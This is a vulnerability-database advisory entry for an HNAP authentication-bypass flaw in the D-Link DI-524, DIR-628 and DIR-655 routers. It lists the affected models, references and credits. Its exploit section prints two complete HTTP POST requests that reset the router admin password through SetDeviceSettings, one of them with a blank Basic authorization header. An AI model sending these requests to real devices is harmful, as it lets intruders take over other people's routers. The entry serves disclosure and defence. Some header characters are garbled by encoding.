ID
VAR-E-201001-1162
TITLE
D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability
Trust: 0.3
DESCRIPTION
Multiple D-Link routers are prone to a security-bypass vulnerability.
Remote attackers can exploit this issue to bypass security restrictions and access certain administrative functions.
This issue affects the following routers:
DI-524
DIR-628
DIR-655
Trust: 0.3
AFFECTED PRODUCTS
vendor: | d link | model: | dir-655 | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | d link | model: | dir-628 | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | d link | model: | di-524 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
An attacker can exploit this issue by using readily available network utilities.
The following example requests are available:
Example 1:
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1:8099
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"
ContentÂLength: 453
<?xml version="1.0" encoding="utfÂ8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchemaÂinstance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
<AdminPassword>testing123</AdminPassword>
</SetDeviceSettings>
</soap:Body>
</soap:Envelope>
Example 2:
POST /HNAP1/ HTTP/1.1
Authorization: Basic dXNlcjo=
Host: 192.168.0.1
SOAPAction: "http://purenetworks.com/HNAP1/SetDeviceSettings"
ContentÂLength: 453
<?xml version="1.0" encoding="utfÂ8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchemaÂinstance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
<AdminPassword>testing123</AdminPassword>
</SetDeviceSettings>
</soap:Body>
</soap:Envelope>
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Design Error
Trust: 0.3
CREDITS
SourceSec Security Research
Trust: 0.3
EXTERNAL IDS
db: | BID | id: | 37690 | Trust: 0.3 |
REFERENCES
url: | http://www.sourcesec.com/lab/dlink_hnap_captcha.pdf | Trust: 0.3 |
url: | http://www.dlink.com/ | Trust: 0.3 |
SOURCES
db: | BID | id: | 37690 |
LAST UPDATE DATE
2022-07-27T09:55:00.611000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 37690 | date: | 2010-01-11T17:51:00 |
SOURCES RELEASE DATE
db: | BID | id: | 37690 | date: | 2010-01-09T00:00:00 |